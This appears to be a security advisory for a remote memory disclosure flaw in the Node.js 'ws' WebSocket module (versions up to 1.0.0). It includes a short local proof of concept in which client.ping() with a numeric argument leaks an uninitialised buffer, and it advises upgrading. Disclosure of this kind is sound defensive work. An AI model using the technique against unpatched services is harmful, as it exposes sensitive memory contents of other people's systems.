Remote Memory Disclosure

Module: ws

Published: January 4th, 2016

Reported by: Feross Aboukhadijeh / Mathias Buss

CVE-NONE

CWE-201

Vulnerable: <= 1.0.0
Patched: >= 1.0.1

Overview

Versions of ws prior to 1.0.1 are affected by a remote memory disclosure vulnerability.

In certain rare circumstances, applications which allow users to control the arguments of a client.ping() call will cause ws to send the contents of an allocated but non-zero-filled buffer to the server. This may disclose sensitive information that still exists in memory after previous use of the memory for other tasks.

Proof of Concept

var ws = require('ws')

var server = new ws.Server({ port: 9000 })
var client = new ws('ws://localhost:9000')

client.on('open', function () {
  console.log('open')
  client.ping(50) // this sends a non-zeroed buffer of 50 bytes

  client.on('pong', function (data) {
    console.log('got pong')
    console.log(data) // Data from the client. 
  })
})

Remediation

Update to version 1.0.1 or greater.

References

Release 1.0.1 Additional Details from Stuart Larsen